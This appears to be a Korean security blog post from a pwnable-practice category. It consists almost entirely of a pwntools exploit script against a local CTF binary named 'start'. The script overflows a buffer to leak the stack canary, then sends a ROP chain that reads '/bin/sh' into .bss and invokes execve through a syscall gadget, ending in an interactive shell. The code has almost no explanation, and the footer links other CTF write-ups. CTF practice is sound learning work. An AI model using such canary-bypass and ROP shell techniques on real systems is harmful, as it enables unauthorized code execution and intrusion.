exploit.py
from pwn import *
p = process("./start")
e = ELF("./start")
payload = "A"*(0x20-12)
payload += "B"*4
p.sendline(payload)
print p.recvuntil("\n")
canary = "\x00" + p.recv(7)
print p.recv()
sleep(0.2)
pop_rax_rdx_rbx = 0x47a6e6
pop_rdi = 0x4005d5
pop_rsi = 0x4017f7
pop_rdx = 0x443776
syscall = 0x4003fc
binsh = "/bin/sh\x00"
read = 0x440300
payload2 = "A"*(0x20-8)
payload2 += canary
payload2 += "C"*8
payload2 += p64(pop_rdi)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(e.bss())
payload2 += p64(pop_rdx)
payload2 += p64(len(binsh))
payload2 += p64(read)
payload2 += p64(pop_rax_rdx_rbx)
payload2 += p64(59)
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0)
payload2 += p64(pop_rdi)
payload2 += p64(e.bss())
payload2 += p64(syscall)
p.sendline(payload2)
print p.recv()
sleep(0.2)
p.sendline("exit")
p.send(binsh)
p.interactive()
'System > Pwnable Practice' 카테고리의 다른 글
| Defcon CTF 2019 Speedrun 1,2 (0) | 2019.08.01 |
|---|---|
| Harekaze CTF 2019 Baby ROP 1,2 (0) | 2019.08.01 |
| Codegate 2019 CTF aeiou (0) | 2019.07.30 |
| Codegate 2016 CTF Watermelon (0) | 2019.07.29 |
| Defcon CTF 2016 Feed me (0) | 2019.07.29 |
JeonYoungSin
메모 기록용 공간